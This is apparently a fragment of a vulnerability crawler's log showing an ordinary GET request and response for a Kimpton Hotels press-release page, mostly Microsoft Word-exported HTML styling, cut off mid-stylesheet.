<o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2010-05-14T00:13:00Z</o:LastPrinted> <o:Created>2010-06-15T21:22:00Z</o:Created> <o:LastSaved>2010-06-15T21:22:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>977</o:Words> <o:Characters>5570</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>46</o:Lines> <o:Paragraphs>11</o:Paragraphs> <o:CharactersWithSpaces>6840</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h1 {mso-style-link:"Heading 1 Char"; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; font-weight:bold; mso-bidi-font-weight:normal;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; background:navy; font-size:10.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-noshow:yes; mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.Heading1Char {mso-style-name:"Heading 1 Char"; mso-style-locked:yes; mso-style-link:"Heading 1"; mso-ansi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; mso-ansi-language:EN-US; mso-fareast-language:EN-US; font-weight:bold; mso-bidi-font-weight:normal;}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-ansi-language:EN-US; mso-fareast-language:EN-US;}p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar {mso-style-name:" Char Char1 Char Char"; margin-top:0in; margin-right:0in; margin-bottom:8.0pt; margin-left:0in; text-align:justify; line-height:12.0pt; mso-line-height-rule:exactly; mso-pagination:none; mso-layout-grid-align:none; font-size:10.0pt; font-family:Arial; mso-ascii-font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:Arial; mso-ansi-language:DE-CH;}p.Default, li.Default, div.Default {mso-style-name:Default; mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:none; mso-layout-grid-align:none; text-autospace:none; font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:578759532; mso-list-type:hybrid; mso-list-template-ids:1908186806 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Symbol;}@list l1 {mso-list-id:700908021; mso-list-type:hybrid; mso-list-template-ids:1744995092 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:1241058028; mso-list-type:hybrid; mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:1319529687; mso-list-type:hybrid; mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:1597444569; mso-list-type:hybrid; mso-list-template-ids:-1248318078 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l6 {mso-list-id:1649477657; mso-list-type:hybrid; mso-list-template-ids:-1886230016 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l7 {mso-list-id:1836218086; mso-list-type:hybrid; mso-list-template-ids:1327258538 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l8 {mso-list-id:1851023485; mso-list-type:hybrid; mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9 {mso-list-id:2057967201; mso-list-type:hybrid; mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l10 {mso-list-id:2140606293; mso-list-type:hybrid; mso-list-template-ids:-893243000 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><bstyle='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='mso-outline-level:1'><b style='mso-bidi-font-weight:normal'><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal style='mso-outline-level:1'><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz &amp; Company for Kimpton<o:p></o:p></span></b></p><p class=Ms..
- /pdfs/press/html/Summer-of-Pride-0510/

/pdfs/press/html/Summer-of-Pride-0510/

http://www.kimptonhotels.com/pdfs/press/html/Summer-of-Pride-0510/

Request

GET /pdfs/press/html/Summer-of-Pride-0510/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Summer-of-Pride-0510/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35075
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>2</o:TotalTime> <o:LastPrinted>2010-05-10T18:00:00Z</o:LastPrinted> <o:Created>2010-05-10T18:01:00Z</o:Created> <o:LastSaved>2010-05-10T18:01:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>750</o:Words> <o:Characters>4280</o:Characters> <o:Lines>35</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5256</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:50331648 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 